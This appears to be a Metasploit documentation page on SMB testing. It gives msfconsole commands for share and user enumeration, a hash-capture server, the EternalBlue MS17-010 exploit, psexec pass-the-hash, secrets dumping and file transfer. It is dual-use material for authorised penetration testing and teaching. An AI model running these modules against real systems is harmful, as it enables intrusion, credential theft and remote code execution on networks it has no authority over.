Link Search Menu Expand Document

SMB Workflows

SMB (Server Message Blocks), is a way for sharing files across nodes on a network.

There are two main ports for SMB:

  • 139/TCP - Initially Microsoft implemented SMB ontop of their existing NetBIOS network architecture, which allowed for Windows computers to communicate across the same network
  • 445/TCP - Newer versions of SMB use this port, were NetBIOS is not used.

Other terminology to be aware of:

  • SMB - Serer Message Blocks
  • CIFS - Common Internet File System
  • Samba - A free software re-implementation of SMB, which is frequently found on unix-like systems

Metasploit has support for multiple SMB modules, including:

  • Version enumeration
  • Verifying/bruteforcing credentials
  • Capture modules
  • Relay modules
  • File transfer
  • Exploit modules

There are more modules than listed here, for the full list of modules run the search command within msfconsole:

msf6 > search mysql

Lab Environment

When testing in a lab environment - SMB can be used on a Window’s host machine, or within Docker.

For instance running Samba on Ubuntu 16.04:

docker run -it --rm --publish --publish ubuntu:16.04 /bin/bash
mkdir -p /tmp/foo
apt update
apt install -y samba

Verifying version is as expected:

$ samba --version
Version 4.3.11-Ubuntu

Configuring the share:

cat << EOF >> /etc/samba/smb.conf
    comment = Foo samba share
    path = /tmp/foo
    read only = no
    browsable = yes

Restart the service:

service smbd restart

SMB Enumeration

Enumerate SMB version:

use auxiliary/scanner/smb/smb_version
run smb://

Enumerate shares:

use auxiliary/scanner/smb/smb_enumshares
run smb://
run smb://user:pass@
run 'smb://domain;user with spaces:pass@' SMB::AlwaysEncrypt=false SMB::ProtocolVersion=1

Enumerate shares and show all files recursively:

use auxiliary/scanner/smb/smb_enumshares
run 'smb://user:pass with a space@' showfiles=true spidershares=true

Enumerate users:

use auxiliary/scanner/smb/smb_enumusers
run smb://user:p4$$w0rd@

Enumerate gpp files in a SMB share:

use auxiliary/scanner/smb/smb_enum_gpp
run smb:// verbose=true store=true
run smb://user:p4$$w0rd@ verbose=true store=true

SMB Server

Create a mock SMB server which accepts credentials before returning NT_STATUS_LOGON_FAILURE. These hashes can then be cracked later:

use auxiliary/server/capture/smb

SMB MS17-010

Metasploit has a module for MS17-010, dubbed Eternal Blue, which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10.

Checking for exploitability:

use auxiliary/scanner/smb/smb_ms17_010
check smb://user:pass@
check smb://domain;user:pass@
check cidr:/24:smb://user:pass@ threads=32

As of 2021, Metasploit supports a single exploit module for which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10, full details within the Metasploit Wrapup:

use exploit/windows/smb/ms17_010_eternalblue
run lhost=
run lhost= lport=5000
run smb://user:pass@ lhost=
run smb://domain;user:pass@ lhost=

SMB psexec

Running psexec against a remote host with credentials:

use exploit/windows/smb/psexec
run smb://user:pass8@ lhost= lport=5000

Running psexec with NTLM hashes:

use exploit/windows/smb/psexec
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6@ lhost= lport=5000

SMB Dumping

Dumping secrets with credentials:

use auxiliary/gather/windows_secrets_dump
run smb://user:pass@

Dumping secrets with NTLM hashes

use auxiliary/gather/windows_secrets_dump
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:15feae27e637cb98ffacdf0a840eeb4b@

SMB Files

Download a file:

use auxiliary/admin/smb/download_file
run smb://a:p4$$w0rd@

Upload a file:

use auxiliary/admin/smb/upload_file
echo "my file" > local_file.txt
run smb://a:p4$$w0rd@ lpath=./local_file.txt